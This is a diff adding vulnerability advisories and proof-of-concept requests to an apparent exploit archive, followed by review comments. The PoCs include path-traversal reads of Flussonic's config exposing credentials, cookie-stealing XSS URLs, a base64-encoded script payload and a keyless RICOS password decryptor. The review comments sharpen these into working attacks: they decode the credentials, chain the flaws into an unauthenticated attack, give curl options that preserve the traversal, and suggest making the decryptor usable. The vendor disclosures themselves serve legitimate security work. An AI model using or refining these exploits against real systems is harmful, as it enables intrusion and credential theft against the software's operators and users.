diff --git a/files.csv b/files.csv index 657e3ad34..043d25b73 100755 --- a/files.csv +++ b/files.csv @@ -30564,3 +30564,9 @@ id,file,description,date,author,platform,type,port 33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0 33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0 33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0 +33939,platforms/java/webapps/33939.txt,"ShopEx Single 4.5.1 'errinfo' Parameter Cross Site Scripting Vulnerability",2010-02-06,"cp77fk4r ",java,webapps,0 +33940,platforms/multiple/remote/33940.txt,"VMware View 3.1.x URL Processing Cross-site Scripting Vulnerability",2010-05-05,"Alexey Sintsov",multiple,remote,0 +33941,platforms/windows/remote/33941.html,"TVUPlayer 2.4.4.9beta1 'PlayerOcx.ocx' Active X Control Arbitrary File Overwrite Vulnerability.",2010-02-03,"Evdokimov Dmitriy",windows,remote,0 +33942,platforms/jsp/webapps/33942.txt,"IBM Algorithmics RICOS 4.5.0 - 4.7.0 - Multiple Vulnerabilities",2014-07-01,"SEC Consult",jsp,webapps,80 +33943,platforms/aix/dos/33943.txt,"Flussonic Media Server 4.1.25 - 4.3.3 - Aribtrary File Disclosure",2014-07-01,"BGA Security",aix,dos,8080 +33944,platforms/windows/remote/33944.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass",2014-07-01,sickness,windows,remote,0 diff --git a/platforms/aix/dos/33943.txt b/platforms/aix/dos/33943.txt new file mode 100755 index 000000000..4e8f0b759 --- /dev/null +++ b/platforms/aix/dos/33943.txt 
@@ -0,0 +1,133 @@ +Document Title: +============ +Flussonic Media Server 4.3.3 Multiple Vulnerabilities + +Release Date: +=========== +June 29, 2014 + +Product & Service Introduction: +======================== +Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5). + +Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network. + +Abstract Advisory Information: +======================= +BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3 + +Vulnerability Disclosure Timeline: +========================= +June 26, 2014 : Contact with Vendor +June 26, 2014 : Vendor Response +June 26, 2014 : Version 4.3.4 Deployed +June 29, 2014 : Public Disclosure + +Discovery Status: +============= +Published + +Affected Product(s): +=============== +Erlyvideo, LLC +Product: Flussonic Media Server 4.1.25 - 4.3.3 + +Exploitation Technique: +================== +AFR: Remote, Unauthenticated +ADL: Remote, Authenticated + +Severity Level: +=========== +High + +Technical Details & Description: +======================== +1. Arbitrary File Read (Unauthenticated) +It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method. + +2. 
Arbitrary Directory Listing (Authenticated) +It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”. + + +Proof of Concept (PoC): +================== +Proof of Concept AFR Request & Response: + +GET /../../../etc/flussonic/flussonic.conf HTTP/1.1 +Host: 6.6.6.100:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive + +HTTP/1.1 200 OK +Connection: keep-alive +Server: Cowboy +Date: Thu, 26 Jun 2014 09:50:57 GMT +Content-Length: 191 +Content-Type: text/plain +Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT +Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687 + +# Default ports Flussonic M1 Media server listens on +http 80; +http 8080; +rtmp 1935; +rtsp 554; +pulsedb /var/run/flussonic; +edit_auth flussonic letmein!; + +live mylive; + +file vod { +path priv; +} + +2. 
Proof of Concept ADR Request & Response: + +GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1 +Host: 6.6.6.100:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h +Connection: keep-alive + +HTTP/1.1 200 OK +Connection: keep-alive +Server: Cowboy +Date: Thu, 26 Jun 2014 11:04:12 GMT +Content-Length: 7555 +X-Route-Time: 28 +X-Run-Time: 8090 +Content-Type: application/json + +{“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"}, +……… +{“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]} + + +Solution Fix & Patch: +================ +Update version 4.3.4 + +Security Risk: +========== +The risk of the vulnerabilities above estimated as high and medium. + +Credits & Authors: +============== +Bilgi Güvenliđi Akademisi + +Disclaimer & Information: +=================== +The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. + +Domain: http://bga.com.tr/advisories.html +Social: http://twitter.com/bgasecurity +Contact: bilgi@bga.com.tr + +Copyright © 2014 | BGA \ No newline at end of file diff --git a/platforms/java/webapps/33939.txt b/platforms/java/webapps/33939.txt new file mode 100755 index 000000000..601e1bbd0 --- /dev/null +++ b/platforms/java/webapps/33939.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39941/info + +ShopEx Single is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +ShopEx Single 4.5.1 is vulnerable; other versions may also be affected. + +http://www.example.com/?gOo=ZXJyb3IuZHd0&errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg== \ No newline at end of file diff --git a/platforms/jsp/webapps/33942.txt b/platforms/jsp/webapps/33942.txt new file mode 100755 index 000000000..1db6ddc2e --- /dev/null +++ b/platforms/jsp/webapps/33942.txt 
@@ -0,0 +1,361 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + +SEC Consult Vulnerability Lab Security Advisory < 20140630-0 > +======================================================================= + title: Multiple severe vulnerabilities + product: IBM Algorithmics RICOS + vulnerable version: 4.5.0 - 4.7.0 + fixed version: 4.7.0.03 + CVE number: CVE-2014-0894 + CVE-2014-0871 + CVE-2014-0870 + CVE-2014-0869 + CVE-2014-0868 + CVE-2014-0867 + CVE-2014-0866 + CVE-2014-0865 + CVE-2014-0864 + impact: critical + homepage: http://www-01.ibm.com/software/analytics/algorithmics/ + found: 2013-12-19 + by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky + SEC Consult Vulnerability Lab + https://www.sec-consult.com +======================================================================= + +Vendor description: +- ------------------- +IBM Algorithmics software enables financial institutions and corporate +treasuries to make risk-aware business decisions. Supported by a global +team of risk experts based in all major financial centers, IBM +Algorithmics solution offerings include market, credit and liquidity risk, +as well as collateral and capital management. + +Source: http://www-01.ibm.com/software/analytics/algorithmics/ + +RICOS is a pre-deal limit management solution part of the Algo Suite. + + +Business recommendation: +- ------------------------ +The identified vulnerabilities affect integrity and confidentiality of the +risk management system. SEC Consult does not recommend to rely on RICOS as +part of risk management until a thorough security review has been performed +by security professionals. As a workaround, access should be limited only to +trusted users internally and sample checks regarding the plausibility of limits +should be performed manually. 
+ + +Vulnerability overview/description: +- ----------------------------------- +1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3) +The Tomcat configuration discloses technical details within error messages to +the user, which allows an attacker to collect valuable data about the +environment of the solution. + +2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5) +The password and the username of the backend database are disclosed in +clear-text to the user of the web application. This allows attackers to +directly connect to the backend database and manipulate arbitrary data stored +in the database (e.g. limits). + +3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3) +Several parameters in the RICOS web front end and the Blotter are not properly +sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal +user sessions and impersonate other users while performing arbitrary actions +on behalf of the victim user. + +4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3) +Weak cryptographic algorithms, being used to store and transfer +user's passwords, allow an attacker to retrieve the plain-text passwords +without further knowledge of cryptographic keys. + +5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 / +CVSS 3.5) +Several fields of stored data within RICOS are marked as read-only in the web +application, disallowing modification of certain fields. These checks are only +performed client-side, allowing an attacker to alter arbitrary data. An +attacker can create a limit, alter the username of the created limit and +confirm the limit himself, circumventing dual control mechanisms advertised by +RICOS. + +6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3) +A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary +cookies for a user that clicks on a manipulated link. 
+ +7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3) +The RICOS fat client submits user credentials in plain-text. An attacker with +access to the network communication can perform man-in-the-middle attacks and +steal user credentials. +This vulnerability also applies to the Blotter, where authentication is +performed unencrypted. + +8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5) +The RICOS fat client performs input validation only client-side. This allows +an attacker to alter arbitrary data. An attacker can create a limit, alter +the username of the created limit and confirm the limit himself, circumventing +dual control mechanisms advertised by RICOS. + +9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3) +The web application does not verify that requests are made only from within +the web application, allowing an attacker to trick users into performing +requests to the web application. This allows an attacker to perform tasks on +behalf of the victim user like modifying limits. + + +Proof of concept: +- ----------------- +1) Information Disclosure +The following URL causes a status 404, disclosing the Tomcat version: +https://ricos/ricos470/classes/ + +If control characters (i.e. \x00) are sent as part of the cookie, a stack trace +is triggered + +2) Password Disclosure +The following request sent by the client during regular communication shows the +database connection settings including the username and the password in +clear-text. + +POST /ricos470/Executer HTTP/1.1 +Host: ricos + +...SNIP... + +...SNIP... + +3) Non-permanent Cross-Site Scripting +The following URLs demonstrate Cross-Site Scripting vulnerabilities: + +POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1 +Host: ricos + +Message=%0D%0A&Stack=java.lang.... 
+ +https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x + +https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);// + +http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y + + +http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/> + +4) Broken Encryption +The user's password is transported frequently in requests within the application. +The following function decrypts the password without requiring any cryptographic key: + +public static void decrypt(String string) +{ + int nRadix = 32; + int nR2 = nRadix * nRadix / 2; + GregorianCalendar cal = new GregorianCalendar(); + String key = string.substring(0, 2); + int nKey = Integer.parseInt(key, 32); + + String encPw = string.substring(2, string.length()); + int y = 0; + for (int i = 0; i < encPw.length(); i+=2) + { + String aktuell = encPw.substring(i,i+2); + int new_value = Integer.parseInt(aktuell, 32); + int character = - nKey * (y + 1) % nR2 + new_value; + char decrypt = (char) character; + System.out.print(decrypt); + y = y + 1; + } +} + +5) Manipulation of read-only data / dual control mechanism bypass +The following example illustrates how to manipulate a request so that the server +saves it on behalf of another user (only the relevant parts are shown): + + + + + + + + + + + + + + + + + + + +[...] + + +[...] + + + +[...] + + + +[...] + + +[...] + + + + + +[...] + + + + +[...] + + + + + +[...] 
+ + + + + + + + +6) Cross-Site Cookie Setting +The following URL allows setting of arbitrary cookies: + +https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content + +7) Plain-text submission of passwords +Neither the fat client nor the Blotter use https to communicate with the +backend server. Both send unencrypted credentials via http during authentication. + +8) Client-side Input Validation +By manipulating serialized objects that are transmitted by the fat client, +it is possible to change the user name who created a limit, allowing an attacker +to bypass dual control mechanisms. + +9) Cross-Site Request Forgery +The following request, sent on behalf of an authenticated user will e.g. +change the currency of a given deal: + +POST http://ricos/ricos470/Executer HTTP/1.1 +Host: ricos + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +...SNIP... + + +Vulnerable / tested versions: +- ----------------------------- +IBM Algorithmics RICOS 4.71 + + +Vendor contact timeline: +- ------------------------ +2014-01-24: Contacting vendor through psirt@vnet.ibm.com +2014-01-24: Vendor response, will likely require more than 30 days to resolve issues + asking for acknowledgements +2014-01-24: Sending acknowledgements +2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues +2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS +2014-02-10: Providing further information on assumed to be false positive issue 1441 +2014-02-14: Telco to clarify vulnerability details and agree on further procedure + patches are scheduled for end of June 2014 +2014-02-20: Vendor confirms issue 1441 to be a vulnerability +2014-05-27: Vendor announces that patches will be released on 2014-06-30 +2014-06-26: Vendor published patches and security bulletin + https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 +2014-06-30: SEC Consult publishes the advisory + + +Solution: +- --------- +Apply patch ACLM 4.7.0.03 FP5. 
More information: +https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 + + +Workaround: +- ----------- +Limit access to RICOS and manually perform sample checks regarding the +plausibility of limits. + + +Advisory URL: +- ------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC Consult Vulnerability Lab + +SEC Consult +Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius + +Headquarter: +Mooslackengasse 17, 1190 Vienna, Austria +Phone: +43 1 8903043 0 +Fax: +43 1 8903043 15 + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +Interested to work with the experts of SEC Consult? +Write to career@sec-consult.com + +EOF F. Lukavsky / @2014 +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.9 (MingW32) +Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ + +iQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+ +uaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg +uFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F +uQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e +0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl +EEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8= +=OFL7 +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/multiple/remote/33940.txt b/platforms/multiple/remote/33940.txt new file mode 100755 index 000000000..6ecc3df2f --- /dev/null +++ b/platforms/multiple/remote/33940.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39949/info + +VMware View is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects VMware View versions prior to 3.1.3. + +http://www.example.com/not_a_real_page \ No newline at end of file diff --git a/platforms/windows/remote/33941.html b/platforms/windows/remote/33941.html new file mode 100755 index 000000000..b21a61b3b --- /dev/null +++ b/platforms/windows/remote/33941.html @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39956/info + +TVUPlayer ActiveX control is prone to a vulnerability that lets attackers overwrite arbitrary local files on the victim's computer in the context of the vulnerable application, typically Internet Explorer, using the ActiveX control. + +TVUPlayer 2.4.9beta1 [build1797] is vulnerable; other versions may be affected. + + \ No newline at end of file diff --git a/platforms/windows/remote/33944.html b/platforms/windows/remote/33944.html new file mode 100755 index 000000000..b68386db4 --- /dev/null +++ b/platforms/windows/remote/33944.html @@ -0,0 +1,340 @@ + + + + +
+ + +
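Review bot: the new files.csv rows (hunk `@@ -30564,3 +30564,9 @@`) carry metadata that contradicts the files they index. Row 33943 files Flussonic under platform `aix`, type `dos`, with the title "... Aribtrary File Disclosure", but the advisory it points to reads `/etc/flussonic/flussonic.conf` through a Cowboy-served HTTP endpoint and lists directories via `/flussonic/api/list_files`: that is path traversal and information disclosure in a web application, not a denial of service, and nothing in the advisory mentions AIX. Suggest `linux` (or `multiple`), `webapps`, and "Arbitrary". Its port column is 8080 only because the PoC host used that port; the recovered config also shows `http 80;`. Row 33941's title says "TVUPlayer 2.4.4.9beta1" while 33941.html says "2.4.9beta1 [build1797]", and the trailing period after "Vulnerability." matches no other row. Row 33939 has trailing whitespace inside the author field (`"cp77fk4r "`), which every CSV consumer will keep. Row 33940 says "3.1.x" while the body says "versions prior to 3.1.3".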
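Review bot: the second PoC heading in 33943.txt reads "Proof of Concept ADR Request & Response", but the section demonstrates the Arbitrary Directory Listing that the advisory abbreviates "ADL" under Exploitation Technique; fix the label so the two halves line up. Two things the PoC leaves for the reader to work out should be stated: the `Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h` header in the second request is base64 for `flussonic:letmein!`, exactly the `edit_auth flussonic letmein!;` line recovered by the first request, so the unauthenticated file read turns the authenticated directory listing into a fully unauthenticated chain; and the literal `GET /../../../etc/flussonic/flussonic.conf` will be collapsed to `/etc/...` by any client that normalises dot-segments (browsers, plain curl), so reproducing it needs a raw socket or an option such as curl's `--path-as-is`. The Severity line says "High" while the Security Risk section says "high and medium"; give one rating per issue. The author line "Bilgi Güvenliđi Akademisi" is mis-encoded and should read "Güvenliği".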
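Review bot: the PoC URL in 33939.txt gives no hint of its encoding, which a reader needs before adapting it: `gOo=ZXJyb3IuZHd0` is base64 for `error.dwt`, and `errinfo=PHNjcmlwdD5hbGVydCgiWFNTRUQiKTwvc2NyaXB0Pg==` is base64 for `<script>alert("XSSED")</script>`, so the sink is the base64-decoded `errinfo` value echoed into the error template, and any other payload has to be re-encoded rather than substituted in place. One line above the URL saying so would spare every reader the manual decode. The files.csv platform tag `java` is not supported by anything in this file; nothing in the PoC identifies the server-side language.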
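Review bot: the version data in 33942.txt is internally inconsistent: the header says "vulnerable version: 4.5.0 - 4.7.0" and "fixed version: 4.7.0.03", the Solution says "ACLM 4.7.0.03 FP5", and "Vulnerable / tested versions" says "IBM Algorithmics RICOS 4.71", which matches neither form (the PoC paths use `/ricos470/`); reconcile it with the header. The PoC bodies for 2), 5), 8) and 9) are `...SNIP...` or runs of blank lines as committed, so the request that discloses the database password, the read-only field manipulation and the CSRF request are not reproducible from this file; if the exporter dropped the XML it should be restored, otherwise those sections should say the bodies were withheld. In the 4) decrypt routine, `int character = - nKey * (y + 1) % nR2 + new_value;` depends on Java precedence (unary minus, then `*`, then `%`, then `+`) and on Java's sign-preserving `%`, so the subtracted term is never reduced into the base-32 alphabet and the `(char)` cast silently wraps negative values; subtracting `Math.floorMod(nKey * (y + 1), nR2)` from `new_value` and returning a String instead of calling `System.out.print` would make the intent explicit and the routine usable, and the unused `GregorianCalendar cal` should go. It is also worth saying outright why no key is needed: the "key" is the first two base-32 characters of the ciphertext itself, so this is obfuscation rather than encryption.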
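Review bot: three of the added files carry no usable proof of concept as committed. 33940.txt ends with `http://www.example.com/not_a_real_page`, a placeholder rather than the URL that triggers the VMware View XSS, yet files.csv classifies it as a `remote` exploit; either restore the SecurityFocus PoC or mark the row as advisory-only. 33941.html, as displayed here, is a description followed by blank lines with no markup instantiating PlayerOcx.ocx, and its version string ("2.4.9beta1 [build1797]") disagrees with its own files.csv title ("2.4.4.9beta1"). 33944.html is declared as 340 added lines but, as displayed, contains nothing beyond whitespace, so the IE8 ASLR/DEP/EMET 4.1.x bypass it is titled for cannot be reviewed from this diff; confirm the exporter is not stripping HTML bodies before merging.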